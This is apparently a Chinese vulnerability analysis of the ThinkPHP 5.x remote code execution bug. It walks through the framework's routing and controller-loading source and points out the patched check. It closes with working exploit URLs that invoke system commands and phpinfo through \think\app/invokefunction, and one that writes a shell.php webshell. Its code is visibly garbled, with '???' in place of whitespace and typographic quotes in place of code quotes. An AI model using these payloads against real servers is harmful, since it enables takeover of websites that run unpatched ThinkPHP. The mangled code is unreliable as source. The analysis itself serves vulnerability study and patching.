ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞

 ???????????if (empty($dispatch)) { ???????????????$dispatch = self::routeCheck($request, $config); ???????????}

//Request::path获取http $_SERVER以及根据config配置参数进行处理/*$path = ‘{$module}/{$controller}/{$action}？{$param1}={$val1}&{$param2}={$val2}……‘*/ ???????$path ??= $request->path(); ???????$depr ??= $config[‘pathinfo_depr‘]; ???????$result = false;

 ???public function pathinfo() ???{ ???????if (is_null($this->pathinfo)) { ???????????if (isset($_GET[Config::get(‘var_pathinfo‘)])) { ????????????????????#s ???????????????// 判断URL里面是否有兼容模式参数 ???????????????$_SERVER[‘PATH_INFO‘] = $_GET[Config::get(‘var_pathinfo‘)]; ???????????????unset($_GET[Config::get(‘var_pathinfo‘)]); ???????????} elseif (IS_CLI) { ???????????????// CLI模式下 index.php module/controller/action/params/... ???????????????$_SERVER[‘PATH_INFO‘] = isset($_SERVER[‘argv‘][1]) ? $_SERVER[‘argv‘][1] : ‘‘; ???????????} ???????????// 分析PATHINFO信息 ???????????if (!isset($_SERVER[‘PATH_INFO‘])) { ???????????????foreach (Config::get(‘pathinfo_fetch‘) as $type) { ????????????????????????????#[‘ORIG_PATH_INFO‘, ‘REDIRECT_PATH_INFO‘, ‘REDIRECT_URL‘] ???????????????????if (!empty($_SERVER[$type])) { ???????????????????????$_SERVER[‘PATH_INFO‘] = (0 === strpos($_SERVER[$type], $_SERVER[‘SCRIPT_NAME‘])) ? ???????????????????????substr($_SERVER[$type], strlen($_SERVER[‘SCRIPT_NAME‘])) : $_SERVER[$type]; ???????????????????????break; ???????????????????} ???????????????} ???????????} ???????????$this->pathinfo = empty($_SERVER[‘PATH_INFO‘]) ? ‘/‘ : ltrim($_SERVER[‘PATH_INFO‘], ‘/‘); ???????} ???????return $this->pathinfo; ???} ???/** ????* 获取当前请求URL的pathinfo信息(不含URL后缀) ????* @access public ????* @return string ????*/ ???public function path() ???{ ???????if (is_null($this->path)) { ???????????$suffix ??= Config::get(‘url_html_suffix‘); ??#html ???????????$pathinfo = $this->pathinfo(); ???????????if (false === $suffix) { ???????????????// 禁止伪静态访问 ???????????????$this->path = $pathinfo; ???????????} elseif ($suffix) { ???????????????// 去除正常的URL后缀 ???????????????$this->path = preg_replace(‘/\.(‘ . ltrim($suffix, ‘.‘) . ‘)$/i‘, ‘‘, $pathinfo); ???????????} else { ???????????????// 允许任何后缀访问 ???????????????$this->path = preg_replace(‘/\.‘ . $this->ext() . ‘$/i‘, ‘‘, $pathinfo); ???????????} ???????} ???????return $this->path; ???}

 ???????????// 路由检测（根据路由定义返回不同的URL调度） ???????????$result = Route::check($request, $path, $depr, $config[‘url_domain_deploy‘]); ??????????????#false ???????????$must ??= !is_null(self::$routeMust) ? self::$routeMust : $config[‘url_route_must‘]; ??????????#false ???????????if ($must && false === $result) { ???????????????// 路由无效 ???????????????throw new RouteNotFoundException(); ???????????} ???????} ???????// 路由无效 解析模块/控制器/操作/参数... 支持控制器自动搜索 ???????if (false === $result) { ???????????$result = Route::parseUrl($path, $depr, $config[‘controller_auto_search‘]); ???????}

 ???public static function parseUrl($url, $depr = ‘/‘, $autoSearch = false) ???{ ???????if (isset(self::$bind[‘module‘])) { ???????????$bind = str_replace(‘/‘, $depr, self::$bind[‘module‘]); ???????????// 如果有模块/控制器绑定 ???????????$url = $bind . (‘.‘ != substr($bind, -1) ? $depr : ‘‘) . ltrim($url, $depr); ???????} ???????$url ?????????????= str_replace($depr, ‘|‘, $url); ???????list($path, $var) = self::parseUrlPath($url); ???????$route ???????????= [null, null, null]; ???????if (isset($path)) { ???????????// 解析模块 ???????????$module = Config::get(‘app_multi_module‘) ? array_shift($path) : null; ???????????if ($autoSearch) { ???????????????// 自动搜索控制器 ???????????????$dir ???= APP_PATH . ($module ? $module . DS : ‘‘) . Config::get(‘url_controller_layer‘); ???????????????$suffix = App::$suffix || Config::get(‘controller_suffix‘) ? ucfirst(Config::get(‘url_controller_layer‘)) : ‘‘; ???????????????$item ??= []; ???????????????$find ??= false; ???????????????foreach ($path as $val) { ???????????????????$item[] = $val; ???????????????????$file ??= $dir . DS . str_replace(‘.‘, DS, $val) . $suffix . EXT; ???????????????????$file ??= pathinfo($file, PATHINFO_DIRNAME) . DS . Loader::parseName(pathinfo($file, PATHINFO_FILENAME), 1) . EXT; ???????????????????if (is_file($file)) { ???????????????????????$find = true; ???????????????????????break; ???????????????????} else { ???????????????????????$dir .= DS . Loader::parseName($val); ???????????????????} ???????????????} ???????????????if ($find) { ???????????????????$controller = implode(‘.‘, $item); ???????????????????$path ??????= array_slice($path, count($item)); ???????????????} else { ???????????????????$controller = array_shift($path); ???????????????} ???????????} else { ???????????????// 解析控制器 ???????????????$controller = !empty($path) ? array_shift($path) : null; ???????????} ???????????// 解析操作 ???????????$action = !empty($path) ? array_shift($path) : null; ???????????// 解析额外参数 ???????????self::parseUrlParams(empty($path) ? ‘‘ : implode(‘|‘, $path)); ???????????// 封装路由 ???????????$route = [$module, $controller, $action]; ???????????// 检查地址是否被定义过路由 ???????????$name ?= strtolower($module . ‘/‘ . Loader::parseName($controller, 1) . ‘/‘ . $action); ???????????$name2 = ‘‘; ???????????if (empty($module) || isset($bind) && $module == $bind) { ???????????????$name2 = strtolower(Loader::parseName($controller, 1) . ‘/‘ . $action); ???????????} ???????????if (isset(self::$rules[‘name‘][$name]) || isset(self::$rules[‘name‘][$name2])) { ???????????????throw new HttpException(404, ‘invalid request:‘ . str_replace(‘|‘, $depr, $url)); ???????????} ???????} ???????return [‘type‘ => ‘module‘, ‘module‘ => $route]; ???} ???/** ????* 解析URL的pathinfo参数和变量 ????* @access private ????* @param string $url URL地址 ????* @return array ????*/ ???private static function parseUrlPath($url) ???{ ???????// 分隔符替换 确保路由定义使用统一的分隔符 ???????$url = str_replace(‘|‘, ‘/‘, $url); ???????$url = trim($url, ‘/‘);#echo $url."<br/>"; ????????$var = []; ???????if (false !== strpos($url, ‘?‘)) { ???????????// [模块/控制器/操作?]参数1=值1&参数2=值2... ???????????$info = parse_url($url); ???????????$path = explode(‘/‘, $info[‘path‘]); ???????????parse_str($info[‘query‘], $var); ???????} elseif (strpos($url, ‘/‘)) { ???????????// [模块/控制器/操作] ???????????$path = explode(‘/‘, $url); ???????} else { ???????????$path = [$url]; ???????} ???????return [$path, $var]; ???}

 ???????// 获取控制器名 ???????$controller = strip_tags($result[1] ?: $config[‘default_controller‘]);
　　　　　　#这里是本次补丁的修补位置，对控制器名增加检查 ???????$controller = $convert ? strtolower($controller) : $controller; ???...... ???????try { ???????????$instance = Loader::controller( ???????????????$controller, ???????????????$config[‘url_controller_layer‘], ???????????????$config[‘controller_suffix‘], ???????????????$config[‘empty_controller‘] ???????????); ???????} catch (ClassNotFoundException $e) { ???????????throw new HttpException(404, ‘controller not exists:‘ . $e->getClass()); ???????}

 public static function controller($name, $layer = ‘controller‘, $appendSuffix = false, $empty = ‘‘) ???{ ???????list($module, $class) = self::getModuleAndClass($name, $layer, $appendSuffix); ???????if (class_exists($class)) { ???????????return App::invokeClass($class); ???????} ???????if ($empty) { ???????????$emptyClass = self::parseClass($module, $layer, $empty, $appendSuffix); ???????????if (class_exists($emptyClass)) { ???????????????return new $emptyClass(Request::instance()); ???????????} ???????} ???????throw new ClassNotFoundException(‘class not exists:‘ . $class, $class); ???}

/thinkphp/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir/thinkphp/public/?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=1/thinkphp/public/?s=index/\think\app/invokefunction&function=system&vars=dir/thinkphp/public/?s=index/\think\app/invokefunction&function=system&return_value=&command=dir/thinkphp/public/?s=index/\think\app/invokefunction&function=system&vars[0]=dir&vars[1][]= ?/thinkphp/public/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>